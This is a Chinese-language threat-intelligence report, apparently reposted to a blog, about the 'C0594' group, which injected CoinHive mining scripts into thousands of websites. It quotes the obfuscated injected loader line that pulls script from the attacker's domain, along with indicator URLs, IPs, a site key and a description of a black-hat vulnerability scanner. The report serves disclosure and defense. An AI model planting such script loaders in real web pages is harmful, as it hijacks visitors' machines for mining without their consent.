C0594组织恶意挖矿攻击,已攻陷数千个网站

18人阅读 评论(0) 收藏 举报
分类:

C0594组织恶意挖矿攻击,已攻陷数千个网站。

0×1 概况

腾讯御见威胁情报中心近期监测发现,包括传统企业、互联网公司、学校和政府机构等在内的多个网站网页被植入挖矿JS脚本。经分析,该批站点中的核心JS文件被注入恶意代码,通过请求同一个脚本文件(http(:)//a.c0594.com/?e=5),加载另一个脚本文件(http(:)//a.c0594.com/?js=1)提供的CoinHive挖矿代码,从而在用户机器上执行挖矿。

\
\

与以往直接在网页源码插入CoinHive挖矿代码不同,此次发现的挖矿行为通过动态加载JS文件,在不同网页中插入同样的恶意代码,并且统计收益的Site Key也相同,可以推测是同一个组织进行的一次有组织的攻击。由于该段挖矿代码来源于a.c0594.com,我们暂且将其称为C0594组织恶意挖矿事件。

\

0×2 事件分析

以该批站点中的bayimg.co网站为例,分析如下:

从bayimg.co网站源码,可看到JS:jquery.cookie.js被注入了恶意代码:

document.write('script src=http://a'+'.c059'+'4.com/?e=5>script>')

\

hxxp://a.c0594.com/?e=5同时会调用hxxp://a.c0594.com/?js=1

\

从而链接到CoinHive挖矿平台,执行挖矿操作。

\

挖矿收益最终归属为Coinhive.com对应Site Key: 99nheD84S8eJK7eD4pufvR5Wd1KGjxlj

在whorunscoinhive.com查询该Site Key挖矿的网页月流量达1011442,排在网页挖矿top榜第56位:

\

0×3 木马溯源

通过搜索引擎,可看到该组织早在2014年就开始对大量网站进行攻击:

\
\

使用腾讯御见威胁情报平台对a.c0594.com进行反查,发现该域名曾解析到ip 62.210.181.55和47.89.176.191

\

继续反查这两个ip,发现其下存在较多xxx.c0594.com以及xxx.094n.com的域名。

\
\

其中域名member.094n.com引起了我们的注意。

\

该平台提供webshell列表、WordPress漏洞列表、网站注入点管理等功能。在产品更新记录中还可以看到对struct漏洞攻击、SQLMAP注入攻击等的更新记录。

\

从网站下载最新的软件得到一款名为Black Spider的黑帽辅助软件。

\

该软件可以批量检测网站的漏洞,提供功能包括:自动爬取Getshell、自动扫描注入点、自动文件探测、旁站C段扫描、漏洞扫描、CMS安全检测、批量检测注入等。

\

软件的CMS.txt文件记录了支持检测的一百多种建站系统漏洞,包括学校建站系统、企业建站系统、文章管理等建站系统的漏洞。

\

针对各类漏洞,Black Spider.exe构造对应的url请求进行检测。

\

该工具可以检测出此次中招网站的Fck上传等漏洞。不法分子亦可利用此工具,通过后门植入挖矿代码或执行其它恶意动作。

\
\

Black Spider工具由Alihack.com开发而成,从挖矿木马所在网站a.c0594.com与黑客工具网站member.094n.com的IP信息也可看出二者关系微妙。

\
\

0×4 安全建议

\

腾讯安全专家建议如下:

1.使用腾讯企业安全“御知”(检测地址:https://s.tencent.com/product/yuzhi/index.html)进行风险扫描和站点监控,及时修复Web服务器建站系统安全漏洞。

2. 网站管理员自查网站源码中是否包含“src=hxxp://a’+’.c059′+’4.com/?e=5”,若有,则表示已被入侵,可删除相关恶意代码。

3. 网站管理员可使用腾讯云网站管家智能防护平台,其具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统。下载地址:https://cloud.tencent.com/product/waf

4. 普通网民可使用腾讯电脑管家拦截含挖矿木马的网页。

0×5 附录

受影响网站(部分):

\
查看评论

记一次服务器被挖矿木马攻击的经历

背景 利用空余时间买了台服务器做了个小网站玩,今天访问了一下,加载巨慢,一看服务器运行情况,CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木...
  • huyuyang6688
  • huyuyang6688
  • 2018-01-07 17:27:18
  • 2700

【每日安全资讯】将近5万家网站被感染挖矿劫持脚本 其中八成是Coinhive

来自Bad Packets Report的安全研究专家Troy Mursch指出,全球范围内将近5万家网站悄然被挖矿劫持版本感染。依靠开源搜索引擎PublicWWW的扫描,Mursch发现至少存在48...
  • F8qG7f9YD02Pe
  • F8qG7f9YD02Pe
  • 2018-03-09 00:00:00
  • 18

恶意爬虫这样窥探、爬取、威胁你的网站

整个互联网的流量中,真人占比有多少? 80% ? 60% ? 50% ? 根据 Aberdeen Group 在近期发布的以北美几百家公司数据为样本的爬虫调查报告显示,2015 年网站流量中的...
  • bigsec
  • bigsec
  • 2016-12-19 14:50:59
  • 3989

阿里云服务器被入侵挂上了wnTKYg挖矿程序解决办法

阿里云安全骑士:第一步:先停掉redis第二步:杀掉进程和删除病毒文件 1:执行top命令,发现wnTKYg竟然占用了99.9%的CPU 2:进入/tmp目录下,会看到有如下两个文件,删除/tm...
  • weixin_36241363
  • weixin_36241363
  • 2017-11-10 16:29:08
  • 1190

阿里云服务器中挖矿木马处理过程

在阿里云租用一台服务器,最近发现被异地登陆,紧接着出现异常下载。登陆服务器,发现CPU达100%,并且安骑士提示有挖矿进程。因为对linux系统不是很熟悉,故而边找资料边处理实验,最后记录下来以便日后...
  • lasig
  • lasig
  • 2018-01-18 14:44:00
  • 834

[摘抄] 精通比特币 区块链 分叉 伪造 造价 节点 算力 50%

精通比特币 作者是Andreas M. Antonopoulos ,本书会为你参与这个货币网络提供必备知识,引导你进入看似复杂的比特币世界。 http://8btc.com/topic-maste...
  • fei33423
  • fei33423
  • 2018-01-04 19:45:31
  • 191

网站就这样被恶意攻击了

最近做公司的一个项目,项目中有一个模块给用户提供一个免费体验功能:每个用户只能使用一次。思路是这样的: 首次加载页面时先异步查询,判断用户是否已经体验过,如果用户已经体验,给用户提示信息,如果没体验,...
  • ydm19891101
  • ydm19891101
  • 2015-04-08 10:31:18
  • 392

【每日安全资讯】南方周末被发现植入了挖矿脚本

中国知名媒体南方周末成为最新加入挖掘数字货币大军的网站之一。用户访问南方周末网页后注意到 CPU 很快就满负荷运转,对网站代码的分析发现它加入了挖矿脚本。网站植入挖矿脚本被认为能提供一种替代广告的收入...
  • F8qG7f9YD02Pe
  • F8qG7f9YD02Pe
  • 2017-12-17 00:00:00
  • 386

短信验证码接口被恶意攻击怎么办?

短信接口验证码通常用于电商、手机APP、网上银行、社交论坛等互联网行业,通过短信验证码进行身份二次验证,确保用户身份真实有效。但是,最近有很多用户莫名收到各类注册短信、验证短信等,技术人员排查,发现是...
  • archer119
  • archer119
  • 2016-11-29 21:16:54
  • 2844

apache防恶意刷新网站和DDOS攻击的技巧

因apache的被ddos攻击和恶意刷新导致apache运行异常,占用资源过大,现在新发现一个很好的解决方法 一些朋友的应用也遇到过类似的烦恼,基本上都通过安装mod_evasive模块得到了较好...
  • u012164361
  • u012164361
  • 2017-04-09 15:24:49
  • 1116
    个人资料
    等级:
    访问量: 659
    积分: 297
    排名: 26万+
    文章存档
    最新评论